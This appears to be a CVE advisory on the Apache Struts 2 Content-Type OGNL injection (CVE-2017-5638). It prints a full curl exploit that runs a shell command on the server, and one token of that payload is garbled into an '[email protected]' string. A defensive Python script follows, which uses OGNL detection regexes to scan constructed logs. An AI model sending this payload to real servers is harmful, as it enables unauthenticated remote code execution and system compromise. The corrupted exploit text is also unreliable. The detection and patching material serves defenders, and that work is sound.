How the mentioned CVE works:
CVE-2017-5638 resides in the Jakarta Multipart parser of Apache Struts 2. It is triggered by a malformed `Content-Type` HTTP header: when a request carries a crafted `Content-Type` value containing an OGNL expression, the parser's flawed exception handling evaluates that expression instead of treating the value as an error. This happens because the error message, which incorporates the attacker-supplied header value, is passed directly to `LocalizedTextUtil.findText()`, and that method interprets the embedded OGNL code. An unauthenticated attacker can thereby achieve remote code execution with the privileges of the Struts application server. The vulnerability is exploitable over the network and requires no user interaction, which makes it highly dangerous.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: 2017-03-10
What Undercode Says:
`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action`
How the Exploit Works:
Craft malicious HTTP request.
Set malicious OGNL in Content-Type.
Send request to Struts endpoint.
OGNL expression executes commands.
Protection from this CVE:
Upgrade Struts immediately.
Apply vendor patch.
Use REST API plugin.
Filter malicious requests.
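Added here to illustrate the "filter malicious requests" mitigation from a defender's side (example code, not from DailyCVE, Undercode or the Struts project): it validates the request `Content-Type` against the RFC 7231 media-type grammar, flags OGNL evaluation markers, and runs that check over constructed log lines. The access-log layout and its `ct="..."` field are assumptions.

```python
import re

# RFC 7231 media-type grammar: token "/" token *( OWS ";" OWS token "=" ( token / quoted-string ) ).
# "{", "}", "(" and ")" are not token characters, so a strict grammar check alone rejects "%{...}" values.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
MEDIA_TYPE_RE = re.compile(rf"^{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED}))*\s*$")

# OGNL evaluation markers seen in S2-045 traffic: %{...}, ${...}, #var= assignments, @class@member references.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#\w+\s*=|@[\w.]+@")

# Hypothetical access-log layout (assumption): combined-log prefix plus a ct="..." field holding the Content-Type.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ct="(?P<ct>.*)"$')

# Constructed sample log lines; the OGNL-bearing ones only carry harmless assignments.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2017:10:01:02 +0000] "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1" 200 ct="multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"
10.0.0.6 - - [07/Mar/2017:10:01:09 +0000] "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1" 200 ct="%{(#a='multipart/form-data').(#b=1+1)}"
10.0.0.7 - - [07/Mar/2017:10:02:11 +0000] "GET /index.action HTTP/1.1" 200 ct="application/x-www-form-urlencoded"
10.0.0.8 - - [07/Mar/2017:10:03:30 +0000] "POST /upload.action HTTP/1.1" 500 ct="${#c=1}"
10.0.0.9 - - [07/Mar/2017:10:04:45 +0000] "POST /upload.action HTTP/1.1" 400 ct="multipart/form-data; boundary="
"""

def classify_content_type(value: str) -> str:
    """'ognl' if OGNL markers are present, 'malformed' if not a valid media type, else 'ok'."""
    if OGNL_MARKERS.search(value):
        return "ognl"
    if MEDIA_TYPE_RE.match(value) is None:
        return "malformed"
    return "ok"

def scan_log(text: str) -> list:
    """Return one finding per log line whose Content-Type a front-end filter should have rejected."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify_content_type(m["ct"])
        if verdict != "ok":
            findings.append({"ip": m["ip"], "path": m["path"], "verdict": verdict, "content_type": m["ct"]})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:9s} {f['ip']:10s} {f['path']}  Content-Type={f['content_type']!r}")
```

The same `classify_content_type` check can be applied in a reverse proxy or servlet filter before the request reaches the multipart parser, rejecting anything that is not a syntactically valid media type.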
Impact:
Remote Code Execution.
Full System Compromise.
Data Theft.
Service Disruption.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode